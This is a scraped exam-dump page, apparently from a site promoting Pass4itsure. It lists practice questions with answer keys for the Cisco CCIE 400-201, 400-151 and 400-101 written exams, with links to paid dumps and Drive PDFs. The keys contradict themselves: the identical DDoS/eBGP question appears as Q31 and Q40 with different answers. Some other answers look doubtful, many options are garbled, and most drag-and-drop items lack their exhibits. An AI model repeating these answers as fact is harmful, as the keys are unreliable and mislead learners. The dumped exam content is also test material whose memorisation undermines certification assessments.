Service providers that implement MPLS Inter-AS Option B must ensure that the ASBRs between each provider learn all VPNv4 routers from both providers. How can this requirements be accomplished?
A. Ensure that each ASBR is configured for all VRFs from within its own provider backbone
B. Configure each ASBR to retain route targets for all VPNv-4 learned routes
C. Configure the VRFs form the connecting provider in order to learn route targets on each ASBR
D. Ensure that LDP is conjured between each ASBR for label exchange on all VRFs
Correct Answer: B

 

QUESTION 29
IPv6 multicast is enabled in a VPLS domain. An operations engineer must reduce the multicast flooding in this VPLS domain. Which feature constrains IPv6 traffic at Layer 2 by configuring Layer 2 ports dynamically to forward IPv6 multicast
traffic only to those ports that want to receive it?
A. IGMP snooping
B. MLD snooping
C. MLD querier
D. IGMP version 3
E. MLD version 2Correct Answer: B

 

QUESTION 30
In the Dual Stack lite solution, what is the function of the B4 component?
A. It acts as an endpoint for the IPv6 in IPv4 encapsulation and forwarding
B. It decapsulates the tunneled IPV4 packets, translate the network address, and routes to the IPv4 network
C. It encapsulates the customer IPv4 packets using IPv6 tunnel and second to the AFTR
D. It reverses network address translated of the eipv4 packets coming from the internet and it sends the resultant IPv4 packets to AFTR
Correct Answer: C

 

QUESTION 31
An support engineer has been tasked to protect an ISP infrastructure from the growing number of encrypted DDoS attacks. The solution should also validate the eBGP peering.
Which solution accomplishes these goals?
A. BGP FlowSpec
B. BTSH
C. BGP Route Dampening
D. BGP LS
E. RTBH
Correct Answer: B

 

QUESTION 32
Which two components does the LDP use to discover neighbors on a network segment? (Choose two)
A. 224.0.0.14 multicast address
B. 224.0.0.1 multicast address
C. 224.0.0.2 multicast address
D. 711 tcp port
E. 646 udp port
F. 711 udp port
G. 646 tcp port
Correct Answer: CE

 

QUESTION 33
A Layer 3 VPN customer opened a case that reports connectivity loss with remote sites. An operations engineer realized this connectivity loss happened after the LDP label filtering was applied. What is the root cause of this issue?
A. Labels were not allocated for the PE , P and RR physical interfaces
B. Labels were not allocated for the PE loopbacks
C. Labels were not allocated for the CE loopback and physical interfaces
D. Labels were not allocated for the P loopbacks
E. Labels were not allocated for the PE, P , and RR loopbacks
F. Labels were not allocated for the P and PE physical interfaces
Correct Answer: B

 

QUESTION 34
Which version of IGMP is required for source specific multicast implementations?
A. IGMP version 2
B. Cisco group management protocol
C. IGMP version 3
D. IGMP version 1
Correct Answer: C

 

QUESTION 35
Which three security mechanisms are used to mitigate or protect against DoS attacks that are targeted at a router? (Choose three)
A. NSR
B. GSTM
C. uRPF
D. BFD
E. FRR
F. CoPP
Correct Answer: BCF

 

QUESTION 36
In a L2VPN service, customer CE sends frames to PE1 using a CoS making value of 3. However , the remote CE receives those frames from PE2 with a CoS marking value of 0.
Which description of this behavior is true?
A. Egress PE2 is not configured with an outbound policy-map facing CE2 to preserve CoS marking
B. Egress PE2 is marking EXP 0 upon label imposition
C. Egress PE2 is not configured with mpls Ldp explicit-null command
D. Ingress PE1 is remarking the CoS frame received from CE1 with valuye of 0
Correct Answer: D

 

QUESTION 37
In an Internet scenario with noncongruent unicast and multicast topologies, which protocol a scalable policy for performing multicast RPF checks?
A. MADCAP
B. MSDP
C. MBGP
D. PGM
Correct Answer: C

 

QUESTION 38

pass4itsure 400-201 exam question

Refer to the exhibit. A network engineer has a requirement to enable MPLS TE tunnels on the network to be L3VPN customers. Which MPLS TE feature allow the network engineer to configure MPLS TE LSPs by using a few CLI commands?
A. AutoTunnel Mesh Groups on all P and PE routers
B. AutoTunnel Primary and Backup on all PE routers
C. AutoTunnel Primary and Backup on all P and PE routers
D. AutoTunnel Mesh Groups on all PE routers
Correct Answer: D

 

QUESTION 39
A design engineer has a requirement to implement QoS with a high degree of granularity in traffic management on a service provider network. The QoS behavior must match these requirements
*Shape multiple queues to a single rate
*Specify the maximum transmission rate of a set traffic classes that are queued separately
*Shape the aggregate traffic of queues on a physical interface
Which deployment meets these requirements ?
A. RSVP
B. LLQ
C. CBWFQ with WRED
D. hierarchical QoS
Correct Answer: D

 

QUESTION 40
An support engineer has been tasked to protect an ISP infrastructure from the growing number of encrypted DDoS attacks. The solution should also validate the eBGP peering.
Which solution accomplishes these goals?
A. BGP FlowSpec
B. BTSH
C. BGP Route Dampening
D. BGP LS
E. RTBH
Correct Answer: E

 

QUESTION 41
A service provider is using Cisco ME 3400 Series Ethernet Access Switches on the edge of a Metro Ethernet POP. A customer has a requirement to connect a switch to the network and requires the ability to trunk VLANs on the uplink port
into the provider network. Which port type should the engineer configure on the switch to meet this requirement while maintaining a secure edge implementation?
A. UNI
B. ENI
C. NNI
D. Access
Correct Answer: C

 

QUESTION 42
Which operational metric to measure the health of the incident management process is critical?
A. A number of successful changes
B. Number of incidents per severity level
C. Mean time to restore service
D. Mean time to resolve incidents
Correct Answer: A

 

QUESTION 43

pass4itsure 400-201 exam question

Refer to the exhibit. Which BGP configuration must be applied to make PE3 use both BGP entries in the Cisco Express Forwarding table?
A. On PE1,apply nexto-hop-self on both PE2 and PE3 neighbors configuration
B. On the CE, apply bgp add-path on both PE1 and PE2 neighbors configuration
C. On PE1, apply route-reflect-client on both PE2 and PE3 neighbors configuration
D. On PE2, apply bgp advertise-best-external on the PE3 neighbor configuration
Correct Answer: D

 

QUESTION 44

pass4itsure 400-201 exam question

Refer to the exhibit. The requirements is to copy traffic from switch A and switch B and to send it to a probe connected to switch D across the routed network. Which technology meets this requirement?
A. NetFlow v5
B. ERSPAN
C. NetFlow v9
D. RSPAN
Correct Answer: B

 

QUESTION 45
Network Operations team has configured the routers with the logging buffered warnings command. Which three severity levels appear in the router syslog? (Choose three)
A. Informational
B. Alerts
C. Notifications
D. Emergencies
E. Errors
F. Debugging
Correct Answer: BDE

 

QUESTION 46

pass4itsure 400-201 exam question

Refer to the exhibit. A company has four office locations, which are identified as 1,2,3 and
4. The PE routers at these locations have assigned RDs of 10:10 , 20:20, 30:30 and 40:40, respectively Locations 1 and 3 need to share routing information
Which set of configurations allows for this requirement?
A. Site 3:
vrf defination ACME
route-target import 10:20
route-target import 20:30
route-target import 40:40
B. Site 1:
vrf defination ACME
route-target import 15:15
Site 3 :
vrf deination ACME
route-target import 15:15
C. Site 1:
vrf defination ACME
route-target import 20:20
route-target import 30:30
route-target import 40:40
D. Site 1:
vrf definition ACME
route-target export 15:15
Site 3:
vrf definition ACME
route-target export 15:15
E. Site 1:
vrf definition ACME
route-target import 30:30
Site 3 :
vrf definition ACME
route-target import 10:10
Correct Answer: E

 

QUESTION 47
A service provider is offering VoIP services level agreement to customers. Which configuration provides validation that the service level agreement has been honored?
A. ipsla 999 udp-jitter 209.165.200.225 1000 codec g729a tag VoIP-SLA ipsla schedule 999 life forever start-time now
B. ipsla 999 icmp-jitter 209.165.200.225 tag VoIP-SLA ipsla schedule 999 life forerver start-time now
C. ipsla 99 icmp-jitter 209.165.200.225 tos 160
ipsla schedule 999 life forever start-time now
D. ipsla 999 udp-jitter 209.165.200.225 tos 160
ipsla schedule 99 life forever start-time now
E. ipsla 999 udp-jitter 209.165.200.225 tos 160
ipsla schedule 999 life forever start-time now
F. ipsla 999 udp-jitter 209.165.200.225 1000 codec g729a tos 160 ipsla schedule 99 life forever stat-time now
Correct Answer: F

 

QUESTION 48

pass4itsure 400-201 exam question

Refer to the exhibit the 2.6.6.6/32 prefix is flapping when PE1 is flapping. Which action can fox this issue?
A. On PE2, allow only redistribution from BGP into IS-IS on PE3, allow only redistribution from IS-IS into BGP
B. On PE2 and PE3 reconfigure redistribute BGP into IS-IS using the metric-type external parameter
C. configure a sham link between PE2 and PE3
D. configure all IS-IS instances as level-1-only
Correct Answer: A

 

QUESTION 49

Refer to the exhibit. Customer Y reported that internet traffic stopped for a few minute. The ISP ABC operation engineer identified that this occurred when ASBR1 router reloaded OSPF coverage faster than BGP. Which command prevent this
happening?
A. Graceful restart
B. set-overload-bit on startup wait-for-bgp
C. bfd min_rx 100 max_rx 100 multiplier 3
D. max-metric router-lsa on startup 300Correct Answer: D

 

QUESTION 50
Which three configuration sections are required on service provider PE router to enable IPv4 layer 3 VPN? (Choose three)
A. Configure route targets that are used for importing and exporting customer VRF routes.
B. Configure route distinguisher that is used for importing and exporting customer VRF routes.
C. Implement MPLS for all customer-facing links.
D. Configure the VPNv4 address-family under the MP-BGP configuration mode on the PE routers that participate in the customer VRF routing.
E. Configure at least one interface that is assigned to a customer link as a member of the VRF
F. Advertise customer route to all PE router by configure the IPv4 address-family under the MP-BGP configuration mode.
Correct Answer: ADE

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video.
Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ get more useful exam content.

Latest 50 Cisco CCIE Service Provider 400-201 YouTube videos:

Bsabio is updated with effective exam dumps throughout the year, and we help many people improve their test skills and success rates.
If you like us, please pay attention to us. The latest Cisco CCIE Service Provider 400-201 Exam Practice test questions and answers “Cisco CCIE® Service Provider Written Exam (400-201)” are provided by Pass4itsure Cisco experts, and if you want to get a 400-201 exam certificate Please select: https://www.pass4itsure.com/400-201.html (Q&As:711 PDF + VCE).

[PDF] Free Cisco CCIE Service Provider 400-201 dumps download from Google Drive: https://drive.google.com/open?id=1Iw6mVrvsYHCf3aOu9MjxosWzr45ntXOJ

[PDF] Free Full Cisco dumps download from Google Drive: https://drive.google.com/drive/folders/1dq6fv9FX6zSDDoHc3ge-WzVU9SNaUbsH

Pass4itsure Promo Code 15% Off

pass4itsure 400-201 coupon

related: https://www.bsabio.org/best-quality-citrix-1y0-a16-dumps/

50 latest Cisco CCIE 400-151 dumps Practice test questions, 400-151 pdf free Download

The best Test dump select Pass4itsure. We succeeded in helping a lot of people pass the exam. Bsabio collects 50 free and effective Cisco CCIE 400-151 exam Dumps “Cisco CCIE Data Center Written Exam (400-151)”, 400-151 pdf online download and 400-151 YouTube online learning to help you improve your success rate if you are a Cisco enthusiast please follow us and we update throughout the year. If you want to get a Cisco CCIE 400-151 exam Certificate: https://www.pass4itsure.com/400-151.html (Q&As:491 PDF + VCE),Guaranteed to pass the exam at once times

[PDF] Free Cisco CCIE 400-151 dumps download from Google Drive: https://drive.google.com/open?id=1mZaaIVJ1i7UXP1e4crXIwjCZBv3_wXn_

[PDF] Free Full Cisco dumps download from Google Drive: https://drive.google.com/drive/folders/1dq6fv9FX6zSDDoHc3ge-WzVU9SNaUbsH

400-151 CCIE Data Center – Cisco: https://www.cisco.com/c/en/us/training-events/training-certifications/exams/current-list/ccie-datacenter-unified.html

Share 50 of the latest Cisco CCIE 400-151 Exam Practice questions and answers for free

QUESTION 1
Drag and drop the feature form the left onto the correct benefits on the right.pass4itsure 400-151 exam question

 

QUESTION 2
Drag and drop the spanning-tree port from the left onto the correct description on the rightpass4itsure 400-151 exam question

 

QUESTION 3
Drag and drop the objects of the ACI policy model from left onto the correct definition on right.pass4itsure 400-151 exam question pass4itsure 400-151 exam question

 

QUESTION 4
Drag and drop the feature from the left onto the left onto the correct description on the rightpass4itsure 400-151 exam question

 

QUESTION 5
Drag and drop me concept of Cisco UCS Director orchestrator from the left onto the correct description on the right.pass4itsure 400-151 exam question

 

QUESTION 6
Drag and drop terms at the Cisco Prime Service Catalog from the left onto the definition on the right.pass4itsure 400-151 exam question pass4itsure 400-151 exam question

 

QUESTION 7
Drag and drop the method from the left onto the correct description on the right.pass4itsure 400-151 exam question

 

QUESTION 8
An admin is updating an existing Cisco UCS environment to accommodate a new storage array that will be directly attached to the Cisco UCS.
Unmanaged servers external to the Cisco UCS fabric interconnects will also access the new array existing Cisco UCS service profiles will be used to access the new storage array.
Drag and drop the appropriate steps from left into the correct order on the right to migrate the Cisco UCS to support the new storage arraypass4itsure 400-151 exam question pass4itsure 400-151 exam question

 

QUESTION 9
Drag and drop the correct port security configuration on the left to the correct action on the right.pass4itsure 400-151 exam question

 

QUESTION 10
Drag and drop the mode of operation on left onto the correct definition on right.pass4itsure 400-151 exam question

 

QUESTION 11
Drag and drop feature on the left onto the appropriate business benefits on the rightpass4itsure 400-151 exam question

 

QUESTION 12
Drag and drop the actions in the left column into the right column in the order in which you would perform those actions in a step-by-step in-service software upgrade processpass4itsure 400-151 exam question pass4itsure 400-151 exam question

 

QUESTION 13
Drag and drop two configurations that should fail without data loss from the left column into the 2 Devices Lost column on the right.pass4itsure 400-151 exam question

 

QUESTION 14
Drag and drop the correct description on the left onto the protocols and features on the right. Not all options will be used.QUESTION 14 Drag and drop the correct description on the left onto the protocols and features on the right. Not all options will be used.

 

QUESTION 15
Drag and drop sequence of the steps on left for ISSU software of dual supervisor switches to achieve a non-disruptive upgrade on the right.pass4itsure 400-151 exam question

 

QUESTION 16
Drag and drop the vPC feature on the left onto the correct description on the right.pass4itsure 400-151 exam question

 

QUESTION 17
Drag and drop the feature form the left onto the correct description on the rightpass4itsure 400-151 exam question pass4itsure 400-151 exam question

 

QUESTION 18
Drag and drop the enlisted four offers from the left onto the correct Cisco ONE Enterprise Cloud Suite on the right.pass4itsure 400-151 exam question

 

QUESTION 19
Drag and drop components of policy drive Layer 4 – Layer 7 services in an ACI environment from left onto the correct definitions on the right.pass4itsure 400-151 exam question pass4itsure 400-151 exam question

 

QUESTION 20
Drag and drop the term about BFD session parameters from the left onto the correct defination on the right?pass4itsure 400-151 exam question

 

QUESTION 21
Drag and Drop the key components of LISP from left onto the correct definitions on the rightpass4itsure 400-151 exam question

 

QUESTION 22
Drag and drop the feature from the left onto the correct benefit on the right.pass4itsure 400-151 exam question pass4itsure 400-151 exam question

 

QUESTION 23
Drag and Droppass4itsure 400-151 exam question

 

QUESTION 24
Drag and drop the orchestration components form the lifet onto relevant Cisco UCS Director functionalities on the right.pass4itsure 400-151 exam question

 

QUESTION 25
You are setting up an ACI spine-leaf architecture and interconnecting the spine switches with the leaf switches. Which description of what happpen initial setup to activate these interlinks is true?
A. Fabric Path must be configured on the interlinks
B. The interlinks are Layer 2 connections and only the allowed VLAN list must be added.
C. The links are creating a Layer 3 network, and all links must be configured as point-to-point links.D. An overlay is created automatically, which creates a setup where the uplinks do not need to be managed manually.
Correct Answer: D

 

QUESTION 26
Which three LSA types are valid for OSPFv2? (Choose three)
A. Router LSA: an LSA sent by every router. This LSA includes the state and the cost of all links and a list of all OSPFv2 neighbors on the link
B. AS Internal LSA: an LSA generated by the ASBR. AS Internal LSAs are flooded only within the autonomous system
C. Backbone Summary: an LSA sent by the backbone router to all the OSPF areas
D. DR Summary LSA: an LSA sent by the DR router to all the others on network
E. Default LSA: an LSA generated by the ASBR. These LSAs are used to propagate default route into OSPF
F. Network LSA: an LSA sent by the DR. This LSA lists all routers in the multi-access network
G. Opaque LSA: an LSA used to extend OSPF
Correct Answer: AFG

 

QUESTION 27
Which statement about network ports in a UCS fabric interconnect is true?
A. Network posts have BPDU Guard enabled.
B. Network posts do not trunk any VLANs unless they are overridden in VLAN Manager.
C. Network posts trunk all VLANs unless they are overridden in VLAN Manager.
D. Network posts are placed into a port channel automatically.
E. Network posts do not trunk any VLANs unless they are overridden in a pin group.
Correct Answer: C

 

QUESTION 28
Which two statemetns about the Cisco Open SND Controller are true? (Choose two)
A. It is a commerical distribution based on the OpenFlow controller.
B. Your own, new ntwork service functions can be added via Java APIs.
C. Security is enforced by using the Open Services Gateway Initiative framework.
D. The controller is available as an appliance only.
E. It can be used in multivendor environments.
Correct Answer: BE

 

QUESTION 29
To test the API in a web browser, which commands must you configure to enable the feature API sandbox on the Cisco Nexus platform running NX-OS?
A. switch(config)# feature nxos-api
switch(config)# nxos-api sandbox
B. switch(config)# feature api
switch(config)# api sandbox
C. switch(config)# feature nx-api
switch(config)# nx-api sandbox
D. switch(config)# feature nxapi
switch(config)# nxapi sandbox
Correct Answer: D

 

QUESTION 30
Which two guidelines apply to private VLAN configuration when you are running FabricPath? (Choose two)
A. FabricPath ports can be put into a private VLAN
B. On the F-Series modules, user-configured static MAC addresses are programmed on all forwarding engines that have ports in that VLAN
C. All VLANs in a private VLAN must be in the same VLAN mode; either CE or FabricPath D. The system does support hierarchical static MAC addresses
D. The F Series module support multiple SPAN destination ports or virtual SPAN.
Correct Answer: BC

 

QUESTION 31
Which two statements about IP Source Guard are true? (Chooes two)
A. IP Source Guard is independent of DHCP snooping to build and maintain the IP-MAC address binding table
B. IP Source Guard requires that DHCP snooping is disabled
C. IP Source Guard limits IP traffic on an interface to only those sources that have an IP-MAC address table entry or static IP source entry
D. By default, IP Source Guard is enabled on all interfaces
E. When you first enable IP Source Guard on an interface, you may experience disruption in IP traffic until the hosts on the interface receive a new IP address from a DHCP server
Correct Answer: CE

 

QUESTION 32
Which option is the default FC-MAP?
A. 0f:fc:00
B. 0e:fc:00
C. 0e:fe:00
D. 0f:fe:00
Correct Answer: B

 

QUESTION 33
Which two connectivity modes does Cisco RISE support? (Choose two)
A. Directly connected. No virtual port channel is supported.
B. Indirectly connected. Only Layer 3 adjacent.
C. Indirectly connected. Only Layer 2 adjacent
D. Indirectly connected. Layer 2 and Layer 3 adjacent.
E. Directly connected. Virtual port channel is supported.
Correct Answer: CE

 

QUESTION 34
Which two options can be used for server pool qualifications? (Choose two)
A. chassis model
B. RAID controller
C. firmware version
D. CPU stepping
E. memory speed
Correct Answer: DE

 

QUESTION 35
Which option is required by atomic counters to be leveraged in troubleshooting endpoint connecticity?
A. Endpoints must be in different endpoint groups
B. Endpoints must connect to different leaf switches
C. Endpoints must connect to the same leaf switch
D. Endpoints must be in different VRFs
E. Endpoints muts be in different bridge domains
Correct Answer: B

 

QUESTION 36
Which two guidelines and limitations of PTP on Cisco NX-OS are ture? (Choose two)
A. PTP supports multicast, unicast, and anycast communication
B. PTP can be enabled only on F – and M – Series module ports.
C. PTP is limitless per network
D. Only one PTP process can control all of the port clocks through the clock manager.E. PTP supports transport over UDP. Transport over Ethernet is not supported.
Correct Answer: DE

 

QUESTION 37
You are configuring an ACI fabric with Layer 3 out connecticity you want to allow traffic to traverse from one extemal EPG to another extermal EPG.or alternatiyely to another internal EPG. Which option must be configured to permit the
packets between these two EPGs, assuming the subnet is already being advertised correctly?
A. Export Route Control
B. Aggregate Export
C. Security import subnet
D. Import Route Control
E. Aggregate Import
Correct Answer: C

 

QUESTION 38
Which three statements are considered best practice when directly connecting converged network adapters to the fabric? (Choose three)
A. Cisco Unified Fabric links must be configured as access ports and FCoE VLAN must not be configured as a native VLAN
B. If MSTP is enabled, a seperate MST instance must be used for FCoE VLANs C. Cisco UF links must be configured as spanning-tree edge ports
C. A shared VLAN can be used to carry traffic for each virtual fabric in the SAN ( for example, VLAN 1002 for VSAN 1, VSAN 2, and so on)
D. Separate FCoE VLANs must be used for FCoE in SAN-A and SAN-B
E. A blade switch must connect to multiple converged access switched in a topology.
Correct Answer: BCE

 

QUESTION 39
Which three commands must be run to enable support of adapter-fex on an interface on a Cisco Nexus Switch? (Choose three)
A. switchport mode vntag
B. feature-set adaper-fex
C. feature-set virtualization
D. feature fex
E. feature adapter-fex
F. switchport mode adapter-fex
Correct Answer: ACE

 

QUESTION 40
Which two guidelines and limitations of netflow on Cisco NX-OS are true? (Choose two)
A. If you change a layer 2 interface to a layer 3 interface, the software converts the layer 2 netflow to layer 3 netflow automatically.
B. It is optional to configure a valid record name
C. The cisco nexus 2000 series fabric extender does not support bridged netflow.
D. Only layer 2 netflow is applied on layer 2 interfaces, and only layer 3 netflow is applied on layer 3 interfaces.
E. You must configure a source interface. If you do not configure a source interface, the exported remains in a disabled state.
Correct Answer: DE

 

QUESTION 41
On a cluster with three APICs, on which APIC can you see actual device package logs?
A. APIC 1
B. on the one that is a leader for device package service
C. depending on the device package, on the APIC that is a leader for that device package
D. depending on the tenant, on the APIC that is a leader for the shard for that particular tenant
Correct Answer: A

 

QUESTION 42
Which two statements about VLAN trunking Protocol are true? (Choose two)
A. On Cisco Nexus switches, VLAN TrunkingProtocol is enabled by default.
B. VLAN Trunking Protocol is only supported on Layer 2 trunk interfaces
C. Layer 2 trunk interfaces, Layer 2 port channels , and virtual port channels support VLAN Trunking Protocol functionality.
D. VLAN Trunking Protocol is a Layer 2 messaging protocol that maintains VLAN consistency by managing the addition, deletion, and renaming of VLANs withing a VLAN Trunking Protocol domain.
E. VLAN Trunking Protocol is a Layer 2 messaging protocol that maintains the interface VLAN configuringwithin a VLAN Trunking Protocol domain.
Correct Answer: CD

 

QUESTION 43
Refer to the exhibit.This output is observed when troubleshooting a blade that is unable to boot from SAN.Which action must the cisco UCS administrator take to resolve this issue?
adapter 1/7/1 (fls):1# lunlist
vnic : 14 lifid:3
– FLOGI State: flogi est (fc_id 0x3a00c0)
– PLOGI Sessions
– WWNN 21:00:00:24:ff:77:77:f2:9a WWPN 21:00:00:24:ff:77:f2:9a fc_id 0x000000
LUN ID : 0x0000000000000000 acccess failure
– REPORT LUNs Query Response
– WWNN 21:00:00:24:ff:77:f2:99 WWPN 21:00:00:24:ff:77:f2:9a fc_id 0x000000
LUN’s configured (SCIS Type, Version, Vendor, Serial No)
LUN ID : 0x0000000000000000 access failure
– REPORT LUNs Query Response
– Nameserver Query Response
– WWPN: 21:00:00:24:ff:77:77:f2:98
– WWPN: 21:00:00:24:ff:77:77:f2:90pass4itsure 400-151 exam question

A. Check the zoning configuration on the fibre Channel switch
B. Check the vHBA VSAN configuration in service profile
C. Check the fatric interconnect storage upink ports
D. Check the iscsi initiator group pool
E. Check the LUN masking configuration on the storage array
Correct Answer: A

 

QUESTION 44
Which three statements are true about redistribution of routes from L3Outs in an ACI Fabric? (Choose three)
A. Routes are not redistributed to leaf switches where the same VRF is present
B. ACI fabric runs MP-BGP
C. Security import subnets control the forwarding of packets into and out of L3Out connections(data plane)
D. Routes learned from L3Outs on border leaf switches are not redistributed into MP-BGP at the ingress lead.
E. Route control subnets control the exchange of routing information(Prefixes) into and out of the fibric (control place)
F. The routes are advertised to all external Layer 3 Outside connections
Correct Answer: BCE

 

QUESTION 45
Refer ti the exhibit, which tool is this sample output from to troubleshoot an ACI fabric?pass4itsure 400-151 exam questionA. traffic map
B. traceroute
C. iPing
D. atomic counters
Correct Answer: D

 

QUESTION 46
Which statement about IP-directed broadcast is true?
A. When a directed broadcast packet reaches a switch that is direcrly connected to its destination subnet, that packet is “exploded” as a broadcast on the destination subnet
B. All switches in the network forward an IP-directed broadcast in the same way they forward unicast IP packets
C. An IP-directed broadcast is a packet whose destination address is a multicast group to send the packet to a group of hosts in a local or remote network
D. All IP-redirected broadcast is an IP packet whose destination address is a valid unicast address, but which originates from a node that is itself part of that destination subnet
Correct Answer: A

 

QUESTION 47
While doing service insertion with vASA with route peering, which two parts must be configured? (Choose two)
A. Point-to-point non-broadcast mode
B. The VM name must be specified when the L4-L7 device is created
C. The path for interfaces must be specified when the L4-L7 device is created
D. The chassis must be specified when the L4-L7 device is created
E. The route peering profile must be specified when the L4-L7 Service Graph template is created
Correct Answer: CE

 

QUESTION 48
Refer to the exhibit. Your application has a reduced health score.Upon inspection,you find a fault that impacts the health score. The fault currently is in the soaking lifecycle stare. Which two options are possible next steps while in this state?
(Choose two)pass4itsure 400-151 exam questionA. Acknowledge the fault. which immediately clears it from the system
B. Once the soaking timer expires the fault ceases and no change is expected in sevenity level.
C. The condition ceases by itself and goes into the soaking-clearing state
D. The condition ceases by itself and automatically clears the fault
E. The soaking timer expires and moves to the Raised sevenity
Correct Answer: CE

 

QUESTION 49
Which three products are part of the Cisco Virtual Application Container Service? (Choose three)
A. Cisco Nexus 9000
B. Cisco Nexus 1000v
C. Application Policy Infrastructure Controller
D. Cisco Prime Network Services Controller
E. Cisco ASR 1000 Router
F. Cisco Virtual Security Gateway
Correct Answer: BDF

 

QUESTION 50
An administrator is reptacing a fabric interconnect.The failed interconnect was FI-A and was master at the time of failure.Which process brings the replacement fabric interconnect into the cluster?
A. Connect the new FI-A to FI-B USING THE Layer 1/Layer 2 cables only.Sync the configuration when prompted.Connect the mangement interface when the configuration is synced.
B. Connect the new FI-A to the management network and the Layer 1/Layer 2 links to the existing FI-B.Use the full state backup file to restore the configuration when prompted at the console.
C. Connect the new FI-A to the management network only. Use the fuil state backup file to restore configuration through Cisco UCS Manager GUI.Connect the Layer 1/Layer 2 cables
D. Connect the FI-A to the management network and the Layer 1/Layer 2 links to the existing FI-B. Use the all configuration backup file to restore the configuration through Cisco UCS Manager GUI
E. Connect the new FI-A to the management network and the Layer 1/Layer 2 links to the existing FI-B Let the system sync with FI-B when promptend at the console
Correct Answer: E

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video.
Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ get more useful exam content.

Latest 50 Cisco CCIE 400-151 YouTube videos:

Bsabio is updated with effective exam dumps throughout the year, and we help many people improve their test skills and success rates. If you like us, please pay attention to us. The latest Cisco CCIE 400-151 Exam Practice test questions and answers “Cisco CCIE Data Center Written Exam (400-151)” are provided by Pass4itsure Cisco experts, and if you want to get a 400-151 exam certificate Please select: https://www.pass4itsure.com/400-151.html (Q&As:491 PDF + VCE).

[PDF] Free Cisco CCIE 400-151 dumps download from Google Drive: https://drive.google.com/open?id=1mZaaIVJ1i7UXP1e4crXIwjCZBv3_wXn_

[PDF] Free Full Cisco dumps download from Google Drive: https://drive.google.com/drive/folders/1dq6fv9FX6zSDDoHc3ge-WzVU9SNaUbsH

Pass4itsure Promo Code 15% Off

pass4itsure 400-151 coupon

related: https://www.bsabio.org/100-pass-guarantee-microsoft-70-696-dumps/

50 latest Cisco CCIE 400-101 dumps Practice test questions, 400-101 pdf free Download

The best Test dump select Pass4itsure. We succeeded in helping a lot of people pass the exam. Bsabio collects 50 free and effective Cisco CCIE 400-101 exam Dumps “CCIE Routing and switching written Exam (400-101)”, 400-101 pdf online download and 400-101 YouTube online learning to help you improve your success rate if you are a Cisco enthusiast please follow us and we update throughout the year. If you want to get a Cisco CCIE 400-101 exam Certificate: https://www.pass4itsure.com/400-101.html (Q&As:1501 PDF + VCE),Guaranteed to pass the exam at once times

Share 50 of the latest Cisco CCIE 400-101 Exam Practice questions and answers for free

QUESTION 1
Which two statements about EIGRP acknowledgement packets are true?(choose two)
A. They are unicast
B. They are Hello packets sent without data
C. They can combine multiple packs in a single packet
D. They are multicast
E. They are broadcast
F. They are required for every request packet
Correct Answer: AB

 

QUESTION 2
Which set of commands conditionally advertises 172.16.0.0/24 as long as 10.10.10.10/32 is the routing
table?
A. neighbor x.x.x.x advertise-map ADV exist-map EXT route-map ADV
match IP address prefix-list ADV
route-map EXT
match IP address prefix-list EXT
ip prefix-list ADV permit 172.16.0.0/24
ip prefix-list EXT permit 10.10.10.10/32
B. neighbor x.x.x.x advertise-map ADV
route-map ADV
match IP address prefix-list ADV
match IP address prefix-list EXT
ip prefix-list ADV permit 172.16.0.0/24
ip prefix-list EXT permit 10.10.10.10/32
C. neighbor x.x.x.x advertise-map ADV
route-map ADV
match IP address prefix-list ADV
match IP address prefix-list EXT
ip prefix-list ADV permit 172.16.0.0/24
ip prefix-list EXT permit 10.10.10.10/32
D. neighbor x.x.x.x advertise-map ADV exist-map EXT route-map ADV
match IP address prefix-list ADV
route-map EXT
match IP address prefix-list EXT
ip prefix-list EXT permit 172.16.0.0/24
ip prefix-list ADV permit 10.10.10.10/32
Correct Answer: A

 

QUESTION 3
which two OSPF network type require the use of a DR and BDR?(choose two)
A. broadcast networks
B. point-to-multipoint network
C. point-to-point non-broadcast networks
D. non-broadcast networks
E. point-to-point networks
Correct Answer: AD

 

QUESTION 4
Which data format is used in this RESET API call?A. BASH
B. XML
C. HTML
D. HTML v5
E. JSON
Correct Answer: E

 

QUESTION 5
which three security controls would you take into consideration when implementing IoT capabilities?
(choose three)
A. Layered Security Approach
B. Define lifecycle controls for IoT devices
C. Implement Intrusion Detection Systems on IoT devices
D. Privacy impact Assessment
E. Place security above functionality
F. Change passwords every 90 days
Correct Answer: ABD

 

QUESTION 6
which two statements about the IS-IS cost metric are true?(choose two)
A. The cost is calculated automatically based on the interface bandwidth and delay
B. It is the only IS-IS metric supported on Cisco devices
C. The cost is calculated automatically based on the delay only
D. The cost is calculated automatically based on the interface bandwidth only
E. A default cost of 1 is automatically assigned to all interface
F. A default cost of 10 is automatically assigned to all interface
Correct Answer: DF

 

QUESTION 7
which two configurations must you perform on a router so that you can use SCP to send configuration files
to an external server?(choose two)
A. Configure the crypto key encrypt rsa command
B. Configure the ip scp server enable command
C. Configure the login local command under the VTY lines
D. Define a domain-name
E. Configure the ip ssh version 2 command
Correct Answer: AC

 

QUESTION 8
Which two route types are allowed to exit an EIGRPstub?(choose two)
A. summary
B. host
C. static
D. connected
E. default
Correct Answer: AD

 

QUESTION 9
Which two protocols are used by the management plane?(choose two)
A. oSPF
B. bGP
C. DTP
D. telnet
E. ISSU
F. TFTP
Correct Answer: DF

 

QUESTION 10
When you implement the EIGRPadd-paths feature, which configuration can cause routing issues on a
DMVPN circuit?
A. disabling the default variance under the EIGRPprocess
B. enable synchronization under the EIGRPprocess
C. disabling ECMP mode under the EIGRPprocess
D. disabling automatic summarization
E. disabling NHRPwhen deploying EIGRPover DMVPN
F. enabling next-hop-self under the EIGRPprocess
Correct Answer: A

 

QUESTION 11
Refer to eh exhibit. You organization has two offices, Site 1 and Site 2, which are connected by a provider
backbone, as shown where must you configure an attachment circuit to allow the two sites to connect over
a Layer 2 network using L2TPv3?
A. PE Site 1 Se0/0 and PE Site 2 Se0/0
B. PE Site 1 Fe1/0 and PE Site 2 Fe0/0
C. PE Site 1 Fe0/0 and PE Site 2 Se0/0
D. PE Site 1 Fe0/0 and PE Site 2 Fe0/0
Correct Answer: B

 

QUESTION 12
which two statements about route summarization are true?(choose two)
A. When a packet is routed to a destination, the router chooses the most specific prefix from the routing
table
B. Routes are automatically summarized to their classful boundary with OSPF
C. BGP sends both specific and aggregate routes unless the keyword “summary-only” is configured
D. It is recommended for use on discontinuous networks
